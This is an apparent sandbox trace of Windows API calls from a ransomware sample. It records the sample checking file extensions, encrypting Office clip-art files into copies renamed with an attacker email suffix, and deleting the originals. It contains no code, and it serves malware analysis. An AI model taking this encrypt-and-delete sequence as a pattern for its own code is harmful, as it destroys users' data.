	[0142.447] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0142.448] lstrlenW (lpString=".bz2") returned 4
	[0142.448] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0142.448] lstrlenW (lpString=".7z") returned 3
	[0142.448] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0142.448] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00273_.WMF") returned 63
	[0142.448] lstrlenW (lpString=".dbf") returned 4
	[0142.448] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0142.448] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00273_.WMF") returned 63
	[0142.448] lstrlenW (lpString=".1cd") returned 4
	[0142.448] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0142.448] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00273_.WMF") returned 63
	[0142.448] lstrlenW (lpString=".jpg") returned 4
	[0142.448] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0142.448] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0142.448] lstrlenW (lpString="BL00274_.WMF") returned 12
	[0142.448] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00274_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00274_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0142.449] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=4164) returned 1
	[0142.449] CloseHandle (hObject=0x3c4) returned 1
	[0142.449] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00274_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00274_.wmf")) returned 0x20
	[0142.449] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00274_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00274_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0142.449] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00274_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00274_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0142.449] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.449] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.449] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00274_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00274_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0142.450] GetLastError () returned 0x0
	[0142.450] ReadFile (in: hFile=0x3c4, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x1044, lpOverlapped=0x0) returned 1
	[0142.451] WriteFile (in: hFile=0x398, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x1050, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x1050, lpOverlapped=0x0) returned 1
	[0142.452] ReadFile (in: hFile=0x3c4, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0142.452] WriteFile (in: hFile=0x398, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0142.452] SetEndOfFile (hFile=0x398) returned 1
	[0142.452] CloseHandle (hObject=0x398) returned 1
	[0142.453] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.453] SetEndOfFile (hFile=0x3c4) returned 1
	[0142.455] CloseHandle (hObject=0x3c4) returned 1
	[0142.455] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00274_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0142.456] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00274_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00274_.wmf")) returned 1
	[0142.456] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00274_.WMF") returned 63
	[0142.456] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00274_.WMF") returned 63
	[0142.456] lstrlenW (lpString=".doc") returned 4
	[0142.456] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0142.456] lstrlenW (lpString=".docx") returned 5
	[0142.456] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0142.456] lstrlenW (lpString=".pdf") returned 4
	[0142.456] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0142.456] lstrlenW (lpString=".xls") returned 4
	[0142.456] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0142.456] lstrlenW (lpString=".xlsx") returned 5
	[0142.456] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0142.456] lstrlenW (lpString=".ppt") returned 4
	[0142.456] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0142.456] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00274_.WMF") returned 63
	[0142.456] lstrlenW (lpString=".zip") returned 4
	[0142.457] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0142.457] lstrlenW (lpString=".rar") returned 4
	[0142.457] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0142.457] lstrlenW (lpString=".bz2") returned 4
	[0142.457] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0142.457] lstrlenW (lpString=".7z") returned 3
	[0142.457] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0142.457] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00274_.WMF") returned 63
	[0142.457] lstrlenW (lpString=".dbf") returned 4
	[0142.457] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0142.457] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00274_.WMF") returned 63
	[0142.457] lstrlenW (lpString=".1cd") returned 4
	[0142.457] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0142.457] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00274_.WMF") returned 63
	[0142.457] lstrlenW (lpString=".jpg") returned 4
	[0142.457] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0142.457] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00274_.WMF") returned 63
	[0142.457] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00274_.WMF") returned 63
	[0142.457] lstrlenW (lpString=".doc") returned 4
	[0142.457] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0142.457] lstrlenW (lpString=".docx") returned 5
	[0142.457] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0142.457] lstrlenW (lpString=".pdf") returned 4
	[0142.457] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0142.457] lstrlenW (lpString=".xls") returned 4
	[0142.457] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0142.457] lstrlenW (lpString=".xlsx") returned 5
	[0142.457] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0142.457] lstrlenW (lpString=".ppt") returned 4
	[0142.457] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0142.457] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00274_.WMF") returned 63
	[0142.457] lstrlenW (lpString=".zip") returned 4
	[0142.457] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0142.458] lstrlenW (lpString=".rar") returned 4
	[0142.458] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0142.458] lstrlenW (lpString=".bz2") returned 4
	[0142.458] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0142.458] lstrlenW (lpString=".7z") returned 3
	[0142.458] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0142.458] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00274_.WMF") returned 63
	[0142.458] lstrlenW (lpString=".dbf") returned 4
	[0142.458] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0142.458] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00274_.WMF") returned 63
	[0142.458] lstrlenW (lpString=".1cd") returned 4
	[0142.458] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0142.458] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00274_.WMF") returned 63
	[0142.458] lstrlenW (lpString=".jpg") returned 4
	[0142.458] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0142.458] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0142.458] lstrlenW (lpString="BL00296_.WMF") returned 12
	[0142.458] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00296_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00296_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0142.459] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=812) returned 1
	[0142.459] CloseHandle (hObject=0x3c4) returned 1
	[0142.459] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00296_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00296_.wmf")) returned 0x20
	[0142.459] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00296_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00296_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0142.459] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00296_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00296_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0142.459] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.459] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.459] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00296_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00296_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0142.460] GetLastError () returned 0x0
	[0142.460] ReadFile (in: hFile=0x3c4, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x32c, lpOverlapped=0x0) returned 1
	[0142.467] WriteFile (in: hFile=0x398, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x330, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x330, lpOverlapped=0x0) returned 1
	[0142.469] ReadFile (in: hFile=0x3c4, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0142.469] WriteFile (in: hFile=0x398, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0142.470] SetEndOfFile (hFile=0x398) returned 1
	[0142.470] CloseHandle (hObject=0x398) returned 1
	[0142.470] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.470] SetEndOfFile (hFile=0x3c4) returned 1
	[0142.472] CloseHandle (hObject=0x3c4) returned 1
	[0142.472] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00296_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0142.472] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00296_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00296_.wmf")) returned 1
	[0142.472] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00296_.WMF") returned 63
	[0142.472] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00296_.WMF") returned 63
	[0142.473] lstrlenW (lpString=".doc") returned 4
	[0142.473] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0142.473] lstrlenW (lpString=".docx") returned 5
	[0142.473] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0142.473] lstrlenW (lpString=".pdf") returned 4
	[0142.473] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0142.473] lstrlenW (lpString=".xls") returned 4
	[0142.473] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0142.473] lstrlenW (lpString=".xlsx") returned 5
	[0142.473] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0142.473] lstrlenW (lpString=".ppt") returned 4
	[0142.473] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0142.473] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00296_.WMF") returned 63
	[0142.473] lstrlenW (lpString=".zip") returned 4
	[0142.473] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0142.473] lstrlenW (lpString=".rar") returned 4
	[0142.473] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0142.473] lstrlenW (lpString=".bz2") returned 4
	[0142.473] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0142.473] lstrlenW (lpString=".7z") returned 3
	[0142.473] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0142.473] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00296_.WMF") returned 63
	[0142.473] lstrlenW (lpString=".dbf") returned 4
	[0142.473] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0142.473] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00296_.WMF") returned 63
	[0142.473] lstrlenW (lpString=".1cd") returned 4
	[0142.473] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0142.473] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00296_.WMF") returned 63
	[0142.473] lstrlenW (lpString=".jpg") returned 4
	[0142.473] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0142.473] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00296_.WMF") returned 63
	[0142.473] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00296_.WMF") returned 63
	[0142.473] lstrlenW (lpString=".doc") returned 4
	[0142.474] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0142.474] lstrlenW (lpString=".docx") returned 5
	[0142.474] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0142.474] lstrlenW (lpString=".pdf") returned 4
	[0142.474] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0142.474] lstrlenW (lpString=".xls") returned 4
	[0142.474] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0142.474] lstrlenW (lpString=".xlsx") returned 5
	[0142.474] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0142.474] lstrlenW (lpString=".ppt") returned 4
	[0142.474] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0142.474] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00296_.WMF") returned 63
	[0142.474] lstrlenW (lpString=".zip") returned 4
	[0142.474] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0142.474] lstrlenW (lpString=".rar") returned 4
	[0142.474] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0142.474] lstrlenW (lpString=".bz2") returned 4
	[0142.474] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0142.474] lstrlenW (lpString=".7z") returned 3
	[0142.474] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0142.474] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00296_.WMF") returned 63
	[0142.474] lstrlenW (lpString=".dbf") returned 4
	[0142.474] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0142.474] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00296_.WMF") returned 63
	[0142.474] lstrlenW (lpString=".1cd") returned 4
	[0142.474] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0142.474] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00296_.WMF") returned 63
	[0142.474] lstrlenW (lpString=".jpg") returned 4
	[0142.474] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0142.474] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0142.475] lstrlenW (lpString="BL00392_.WMF") returned 12
	[0142.475] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00392_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00392_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0142.481] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=27050) returned 1
	[0142.481] CloseHandle (hObject=0x31c) returned 1
	[0142.481] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00392_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00392_.wmf")) returned 0x20
	[0142.508] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00392_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00392_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0142.508] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00392_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00392_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0142.508] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.508] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.508] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00392_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00392_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0142.509] GetLastError () returned 0x0
	[0142.509] ReadFile (in: hFile=0x3a0, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x69aa, lpOverlapped=0x0) returned 1
	[0142.540] WriteFile (in: hFile=0x384, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x69b0, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x69b0, lpOverlapped=0x0) returned 1
	[0142.542] ReadFile (in: hFile=0x3a0, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0142.542] WriteFile (in: hFile=0x384, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0142.542] SetEndOfFile (hFile=0x384) returned 1
	[0142.542] CloseHandle (hObject=0x384) returned 1
	[0142.542] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.542] SetEndOfFile (hFile=0x3a0) returned 1
	[0142.545] CloseHandle (hObject=0x3a0) returned 1
	[0142.545] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00392_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0142.566] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00392_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00392_.wmf")) returned 1
	[0142.566] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00392_.WMF") returned 63
	[0142.566] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00392_.WMF") returned 63
	[0142.566] lstrlenW (lpString=".doc") returned 4
	[0142.566] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0142.567] lstrlenW (lpString=".docx") returned 5
	[0142.567] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0142.567] lstrlenW (lpString=".pdf") returned 4
	[0142.567] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0142.567] lstrlenW (lpString=".xls") returned 4
	[0142.567] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0142.567] lstrlenW (lpString=".xlsx") returned 5
	[0142.567] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0142.567] lstrlenW (lpString=".ppt") returned 4
	[0142.567] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0142.567] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00392_.WMF") returned 63
	[0142.567] lstrlenW (lpString=".zip") returned 4
	[0142.567] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0142.567] lstrlenW (lpString=".rar") returned 4
	[0142.567] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0142.567] lstrlenW (lpString=".bz2") returned 4
	[0142.567] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0142.567] lstrlenW (lpString=".7z") returned 3
	[0142.567] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0142.567] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00392_.WMF") returned 63
	[0142.567] lstrlenW (lpString=".dbf") returned 4
	[0142.567] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0142.567] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00392_.WMF") returned 63
	[0142.567] lstrlenW (lpString=".1cd") returned 4
	[0142.567] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0142.567] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00392_.WMF") returned 63
	[0142.567] lstrlenW (lpString=".jpg") returned 4
	[0142.567] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0142.567] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00392_.WMF") returned 63
	[0142.567] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00392_.WMF") returned 63
	[0142.567] lstrlenW (lpString=".doc") returned 4
	[0142.567] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0142.567] lstrlenW (lpString=".docx") returned 5
	[0142.568] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0142.568] lstrlenW (lpString=".pdf") returned 4
	[0142.568] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0142.568] lstrlenW (lpString=".xls") returned 4
	[0142.568] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0142.568] lstrlenW (lpString=".xlsx") returned 5
	[0142.568] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0142.568] lstrlenW (lpString=".ppt") returned 4
	[0142.568] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0142.568] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00392_.WMF") returned 63
	[0142.568] lstrlenW (lpString=".zip") returned 4
	[0142.568] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0142.568] lstrlenW (lpString=".rar") returned 4
	[0142.568] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0142.568] lstrlenW (lpString=".bz2") returned 4
	[0142.568] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0142.568] lstrlenW (lpString=".7z") returned 3
	[0142.568] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
